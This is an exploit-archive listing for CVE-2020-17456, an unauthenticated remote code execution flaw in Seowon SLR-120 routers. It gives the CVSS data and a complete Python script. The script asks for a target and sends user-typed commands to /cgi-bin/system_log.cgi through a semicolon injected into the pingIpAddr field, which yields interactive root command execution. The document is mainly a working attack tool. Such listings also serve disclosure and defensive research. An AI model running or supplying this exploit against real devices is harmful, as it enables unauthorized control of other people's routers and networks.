Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)

2022.03.11
ir Aryan Chehreghani (IR) ir
Risk: Medium
Local: Yes
Remote: Yes
CVE: CVE-2020-17456
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) # Date: 2022-03-11 # Exploit Author: Aryan Chehreghani # Vendor Homepage: http://www.seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30 # Version: All version # Tested on: Windows 10 Enterprise x64 , Linux # CVE : CVE-2020-17456 # [ About - Seowon SLR-120 router ]: #The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile, #The convenience of sharing wireless internet access invigorates your lifestyle, families, #friends and workmates. Carry it around to boost your active communication anywhere. # [ Description ]: #Execute commands without authentication as admin user , #To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user. # [ Vulnerable products ]: #SLR-120S42G #SLR-120D42G #SLR-120T42G import requests print (''' ########################################################### # Seowon SLR-120S42G router - RCE (Unauthenticated) # # BY:Aryan Chehreghani # # Team:TAPESH DIGITAL SECURITY TEAM IRAN # # mail:aryanchehreghani@yahoo.com # # -+-USE:python script.py # # Example Target : http://192.168.1.1:443/ # ########################################################### ''') url = input ("=> Enter Target : ") while(True): try: cmd = input ("~Enter Command $ ") header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "*/*", "Accept-Language": "en-US,en;q:0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "207", "Origin": "http://192.168.1.1", "Connection": "close", "Referer": "http://192.168.1.1/", "Upgrade-Insecure-Requests": "1" } datas = { 'Command':'Diagnostic', 'traceMode':'ping', 'reportIpOnly':'', 'pingIpAddr':';'+cmd, 'pingPktSize':'56', 'pingTimeout':'30', 'pingCount':'4', 'maxTTLCnt':'30', 'queriesCnt':'3', 'reportIpOnlyCheckbox':'on', 'logarea':'com.cgi', 'btnApply':'Apply', 'T':'1646950471018' } x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas) print(x.text) except: break


See this note in RAW Version
Vote for this issue:
90%
10%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top